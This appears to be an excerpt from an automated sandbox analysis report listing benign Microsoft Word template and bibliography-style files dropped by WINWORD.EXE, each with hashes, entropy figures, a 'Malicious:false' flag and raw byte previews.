                                                                                                                            SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):262
                                                                                                                            Entropy (8bit):3.4901887319218092
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                            MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                            SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                            SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                            SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5596
                                                                                                                            Entropy (8bit):7.875182123405584
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                            MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                            SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                            SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                            SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):242
                                                                                                                            Entropy (8bit):3.4938093034530917
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                            MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                            SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                            SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                            SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4888
                                                                                                                            Entropy (8bit):7.8636569313247335
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                            MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                            SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                            SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                            SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):260
                                                                                                                            Entropy (8bit):3.494357416502254
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                            MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                            SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                            SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                            SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6193
                                                                                                                            Entropy (8bit):7.855499268199703
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                            MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                            SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                            SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                            SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):258
                                                                                                                            Entropy (8bit):3.4692172273306268
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                            MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                            SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                            SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                            SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):7370
                                                                                                                            Entropy (8bit):7.9204386289679745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                            MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                            SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                            SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                            SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):286
                                                                                                                            Entropy (8bit):3.538396048757031
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                            SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                            SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                            SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):250983
                                                                                                                            Entropy (8bit):5.057714239438731
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                            MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                            SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                            SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                            SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):290
                                                                                                                            Entropy (8bit):3.5081874837369886
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                            SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                            SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                            SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):255948
                                                                                                                            Entropy (8bit):5.103631650117028
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                            MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                            SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                            SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                            SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288
                                                                                                                            Entropy (8bit):3.523917709458511
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                            SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                            SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                            SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):296658
                                                                                                                            Entropy (8bit):5.000002997029767
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                            MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                            SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                            SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                            SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):260
                                                                                                                            Entropy (8bit):3.4895685222798054
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                            MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                            SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                            SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                            SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3075
                                                                                                                            Entropy (8bit):7.716021191059687
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                            MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                            SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                            SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                            SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
